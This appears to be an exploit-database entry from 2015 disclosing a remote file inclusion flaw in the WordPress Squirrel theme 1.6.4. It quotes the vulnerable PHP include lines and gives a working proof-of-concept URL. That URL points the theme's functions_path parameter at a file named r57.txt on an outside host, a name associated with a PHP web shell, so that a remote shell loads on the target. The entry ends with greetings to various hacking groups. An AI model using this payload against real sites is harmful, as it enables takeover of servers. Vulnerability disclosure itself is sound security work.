id: 24719
date: 12/13/2015
title: WordPress Squirrel Theme 1.6.4 Remote File Inclusion Vulnerability
author: indoushka
cves: 

| # Title    : WP-squirrel 1.6.4 Theme R/L Files Inclusion Download Vulnerability   
| # Author   : indoushka                                                               
| # email    : indoushka4ever@gmail.com                                                                                                                                                                 
| # Tested on: windows 8.1 Français V.(Pro)        
| # Download : https://wordpress.org/themes/squirrel/
=======================================

poc :

require_once ($functions_path . 'admin-functions.php');  // Custom functions and plugins
require_once ($functions_path . 'admin-interface.php');  // Admin Interfaces (options,framework, seo)
/* These files build out the theme specific options and associated functions. */
require_once ($functions_path . 'theme-options.php');   // Options panel settings and custom settings

http://127.0.0.1/wordpress/wp-content/themes/squirrel/functions.php?functions_path=http://www.dcvi.net/r57.txt

Greetz : 
jericho  http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net
---------------------------------------------------------------------------------------------------------------

#  0day.today [2023-03-25]  #